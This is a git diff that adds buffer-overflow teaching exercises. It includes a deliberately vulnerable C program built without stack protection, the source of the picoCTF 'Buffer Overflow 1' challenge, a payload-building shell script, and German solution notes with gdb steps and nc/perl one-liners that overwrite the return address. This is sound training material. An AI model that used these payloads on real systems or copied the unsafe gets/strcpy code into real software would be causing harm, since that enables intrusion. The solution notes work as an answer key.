diff --git a/assets/logic/.gitignore b/assets/logic/.gitignore new file mode 100644 index 0000000..e2250f7 --- /dev/null +++ b/assets/logic/.gitignore @@ -0,0 +1 @@ +logic diff --git a/assets/logic/Makefile b/assets/logic/Makefile new file mode 100644 index 0000000..a9a0bc4 --- /dev/null +++ b/assets/logic/Makefile @@ -0,0 +1,16 @@ +# use bash so process substutution is available +CC = gcc +CFLAGS = -fno-stack-protector -g +SHELL = bash +SRC = logic.c +TARGET = $(SRC:%.c=%) + +.PHONY: build +build: $(TARGET) + +%: %.c + $(CC) ${CFLAGS} $< -o $@ + +.PHONY: clean +clean: + rm -f logic diff --git a/assets/logic.c b/assets/logic/logic.c similarity index 79% rename from assets/logic.c rename to assets/logic/logic.c index ba6bab4..2812eee 100644 --- a/assets/logic.c +++ b/assets/logic/logic.c @@ -3,7 +3,7 @@ void foo(char *input) { int is_logged_in = 0; - char buf[50]; + char buf[64]; strcpy(buf, input); if (is_logged_in) { puts("logged in!!1!"); @@ -13,5 +13,9 @@ void foo(char *input) { } int main(int argc, char **argv) { + if (argc != 2) { + return 1; + } foo(argv[1]); + return 0; } diff --git a/assets/logic/solution.md b/assets/logic/solution.md new file mode 100644 index 0000000..9d56b39 --- /dev/null +++ b/assets/logic/solution.md @@ -0,0 +1,8 @@ +# Beispiel 1 + + * Debugger `gdb` + * `list` für Code + * `break ` für Breakpoint + * `run $(python -c 'print("A"*77)')` + * `show is_logged_in` + * `continue` diff --git a/assets/picoctf/buffer_overflow_1/.gitignore b/assets/picoctf/buffer_overflow_1/.gitignore new file mode 100644 index 0000000..c2981a9 --- /dev/null +++ b/assets/picoctf/buffer_overflow_1/.gitignore @@ -0,0 +1 @@ +payload diff --git a/assets/picoctf/buffer_overflow_1/payload.sh b/assets/picoctf/buffer_overflow_1/payload.sh new file mode 100755 index 0000000..c25475a --- /dev/null +++ b/assets/picoctf/buffer_overflow_1/payload.sh @@ -0,0 +1,17 @@ +#!/usr/bin/env bash + +function repeat() { + n="${1}" + string="${2}" + printf "%${n}s" | tr " " "${string}" +} + +function main() { + buffer_size="${1}" + address="${2}" + filler="$(repeat "${buffer_size}" A)" + newline="\n" + printf "%s%b%b" "${filler}" "${address}" "${newline}" +} + +main "${@}" diff --git a/assets/picoctf/buffer_overflow_1/solution.md b/assets/picoctf/buffer_overflow_1/solution.md new file mode 100644 index 0000000..480011c --- /dev/null +++ b/assets/picoctf/buffer_overflow_1/solution.md @@ -0,0 +1,10 @@ +# PicoCTF - Buffer Overflow 1 + +https://play.picoctf.org/practice/challenge/258?category=6&page=1 + + * Buffergröße bestimmen + * Return Adresse überschreiben + * Adresse der Zielfunktion finden `nm -g -C vuln` + * Little Endian! + * `./payload.sh 44 "\xf6\x91\x04\x08" | nc ...` + * `perl -e 'print "A"x44 . "\xf6\x91\x04\x08\n"'` diff --git a/assets/picoctf/buffer_overflow_1/vuln b/assets/picoctf/buffer_overflow_1/vuln new file mode 100644 index 0000000..6b42c3e Binary files /dev/null and b/assets/picoctf/buffer_overflow_1/vuln differ diff --git a/assets/picoctf/buffer_overflow_1/vuln.c b/assets/picoctf/buffer_overflow_1/vuln.c new file mode 100644 index 0000000..e2dcd2c --- /dev/null +++ b/assets/picoctf/buffer_overflow_1/vuln.c @@ -0,0 +1,42 @@ +#include +#include +#include +#include +#include +#include "asm.h" + +#define BUFSIZE 32 +#define FLAGSIZE 64 + +void win() { + char buf[FLAGSIZE]; + FILE *f = fopen("flag.txt","r"); + if (f == NULL) { + printf("%s %s", "Please create 'flag.txt' in this directory with your", + "own debugging flag.\n"); + exit(0); + } + + fgets(buf,FLAGSIZE,f); + printf(buf); +} + +void vuln(){ + char buf[BUFSIZE]; + gets(buf); + + printf("Okay, time to return... Fingers Crossed... Jumping to 0x%x\n", get_return_address()); +} + +int main(int argc, char **argv){ + + setvbuf(stdout, NULL, _IONBF, 0); + + gid_t gid = getegid(); + setresgid(gid, gid, gid); + + puts("Please enter your string: "); + vuln(); + return 0; +} +